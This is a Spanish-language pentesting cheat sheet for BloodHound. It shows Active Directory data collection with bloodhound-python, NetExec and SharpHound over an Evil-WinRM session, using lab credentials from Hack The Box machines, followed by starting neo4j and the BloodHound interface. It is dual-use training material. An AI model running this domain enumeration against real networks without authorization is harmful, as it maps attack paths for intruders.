⚪ BloodHound

Ingestor

El ingestor se encarga de recopilar de forma remota/local toda la información relevante del Active Directory, luego la exporta a un archivo saliente .zip que posteriormente podra ser importado en BloodHound para visualizar cómodamente el mapa del dominio.

Remoto

bloodhound-python

bloodhound-python -u svc-alfresco -p s3rvice -ns 192.168.1.2 -d htb.local -c All --zip
# proxy / tunnel / pivoting / proxychains
proxychains -q bloodhound-python -u svc-alfresco -p s3rvice -ns 192.168.1.2 -d htb.local -c All --dns-tcp --zip

NetExec

rm ~/.nxc/logs/*
netexec ldap 192.168.1.2 -u 'svc-alfresco' -p 's3rvice' --bloodhound --collection All
netexec ldap 192.168.1.2 -u 'svc-alfresco' -p 's3rvice' --bloodhound --collection All --dns-server 192.168.1.2
mv ~/.nxc/logs/*.zip .

Local

SharpHound.exe

*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\Privesc> upload SharpHound.exe
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\Privesc> .\SharpHound.exe -c All
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\Privesc> dir

    Directory: C:\Users\svc_loanmgr\Desktop\Privesc

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/26/2022   7:44 AM          11633 20220926074434_BloodHound.zip
-a----        9/26/2022   7:42 AM        1051648 SharpHound.exe
-a----        9/26/2022   7:44 AM           8601 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin

*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\Privesc> download 20220926074434_BloodHound.zip

SharpHound.ps1

*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> upload SharpHound.ps1                                                                                                              
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> Import-Module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> Invoke-BloodHound -CollectionMethod All
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> dir

    Directory: C:\Users\svc_loanmgr\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/25/2022   5:41 PM           9112 20220925174131_BloodHound.zip
-a----        9/25/2022   5:40 PM         973325 SharpHound.ps1
-a----        9/25/2022   5:41 PM          11122 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin

*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> download 20220925174131_BloodHound.zip

Analisis

Iniciar

neo4j

Se encarga de gestionar la base de datos, las credenciales por defecto al intalar son neo4j:neo4j
(Las credenciales han de ser cambiadas cuando se inicie por primera vez tras la intalación)

# apt install -y neo4j
neo4j console

bloodhound

Se encarga de visualizar los datos obtenidos del archivo .zip haciendo click en Upload Data

# apt install -y bloodhound
bloodhound

© d4t4s3c 2025

results matching ""

No results matching ""